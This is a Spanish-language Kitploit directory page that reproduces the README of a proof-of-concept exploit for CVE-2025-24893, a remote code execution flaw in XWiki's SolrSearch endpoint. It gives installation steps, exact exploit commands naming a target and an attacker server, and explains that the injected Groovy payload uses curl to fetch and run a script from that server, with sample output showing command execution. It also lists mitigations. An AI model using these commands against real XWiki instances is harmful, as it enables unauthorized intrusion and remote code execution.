Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
xwiki-cve-2025-24893-poc — PoC para CVE-2025-24893 | Kitploit
Herramientas/GitHubGitHub/570rmbr3ak3r/xwiki-cve-2025-24893-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHub570rmbr3ak3r/xwiki-cve-2025-24893-poc

xwiki-cve-2025-24893-poc

PoC para CVE-2025-24893

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
314hace 1 añoAún no revisado
Compartir

PoC de Exploit RCE en XWiki (CVE-2025-24893)

Descripción general

Este repositorio contiene una Prueba de Concepto (PoC) del exploit para la vulnerabilidad de Ejecución Remota de Código (RCE) en XWiki identificada como CVE-2025-24893. La vulnerabilidad permite a un atacante ejecutar código arbitrario en una instancia de XWiki objetivo aprovechando una solicitud manipulada al endpoint SolrSearch. Este script admite objetivos tanto HTTP como HTTPS.

⚠️ Aviso: Esta PoC está destinada únicamente a fines educativos y de investigación. El uso no autorizado de este código contra sistemas sin permiso explícito es ilegal y poco ético. Obtenga siempre la autorización adecuada antes de probar cualquier sistema.

Detalles de la vulnerabilidad

  • ID CVE: CVE-2025-24893
  • Componente afectado: endpoint SolrSearch de XWiki
  • Impacto: Ejecución Remota de Código (RCE)
  • Aviso: Aviso de seguridad de GitHub

La vulnerabilidad surge debido a un manejo incorrecto de la entrada del usuario en el endpoint SolrSearch, lo que permite la inyección de código Groovy a través de un payload manipulado. Esta PoC demuestra cómo un atacante puede explotar esto para ejecutar comandos arbitrarios en el servidor objetivo.

Requisitos previos

  • Python 3.x
  • Bibliotecas de Python necesarias: requests, , , ,
Descargar herramienta
argparse
urllib.parse
re
html
  • Una instancia de XWiki objetivo vulnerable a CVE-2025-24893
  • Un servidor controlado por el atacante para alojar el script bash, accesible mediante HTTP o HTTPS
  • Un archivo que contenga el código a ejecutar en el objetivo
  • Instalación

    1. Clone este repositorio:
      root@kitploit:~
      git clone https://github.com/570RMBR3AK3R/xwiki-cve-2025-24893-poc.git
      
    2. Instale las bibliotecas de Python necesarias:
      root@kitploit:~
      pip install requests
      

    Uso

    El script envía una solicitud HTTP/HTTPS manipulada a la instancia de XWiki objetivo, inyectando un payload Groovy que ejecuta un comando curl para recuperar y ejecutar un archivo desde un servidor controlado por el atacante.

    Ejecute el script con el siguiente comando:

    root@kitploit:~
    python3 exploit.py --url <target_url> --server <attacker_server> --file <malicious_file> [--no-verify]
    

    Argumentos

    • --url: La URL base de la instancia de XWiki objetivo (ej. http://target o https://target).
    • --server: La IP o nombre de host del servidor del atacante, incluyendo el puerto si es necesario (ej. 192.168.1.100:8080). Soporta tanto HTTP como HTTPS.
    • --file: El nombre del archivo en el servidor del atacante que contiene el código a ejecutar (ej. exploit.sh).
    • --no-verify: Bandera opcional para deshabilitar la verificación SSL en objetivos HTTPS (usar con precaución, solo para pruebas).

    Ejemplo

    root@kitploit:~
    python3 exploit.py --url http(s)://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh
    

    Para omitir la verificación SSL (por ejemplo, para certificados autofirmados):

    root@kitploit:~
    python3 exploit.py --url https://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh --no-verify
    

    Esto hará lo siguiente:

    1. Construirá un payload que utiliza el script Groovy para ejecutar un comando curl.
    2. Recuperará el archivo especificado (exploit.sh) desde el servidor del atacante (http(s)://192.168.1.100:8080).
    3. Ejecutará el archivo recuperado en el sistema objetivo.
    4. Extraerá y mostrará la salida, limpiando cualquier etiqueta HTML y entidad.

    Salida

    El script extrae la respuesta del objetivo, elimina las etiquetas HTML (ej. <br/>, <del>), y convierte las entidades HTML a texto plano para facilitar la lectura. La salida limpia se imprime en la consola.

    Ejemplo

    root@kitploit:~
    python3 exploit.py --url http://<redacted> --server http://<redacted>:8080 --file exploit.sh 
    uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)
    

    Limitaciones

    • La instancia de XWiki objetivo debe ser vulnerable a CVE-2025-24893.
    • El servidor del atacante debe ser accesible desde el sistema objetivo mediante HTTP o HTTPS.
    • El script asume que el servidor objetivo soporta el endpoint SolrSearch y la ejecución de Groovy.

    Mitigación

    Para protegerse contra esta vulnerabilidad:

    • Actualice XWiki a la última versión parcheada.
    • Consulte el Aviso de seguridad de GitHub para obtener pasos detallados de mitigación.
    • Blog de referencia CVE-2025-24893

    Licencia

    Este proyecto está licenciado bajo la Licencia MIT. Consulte el archivo LICENSE para más detalles.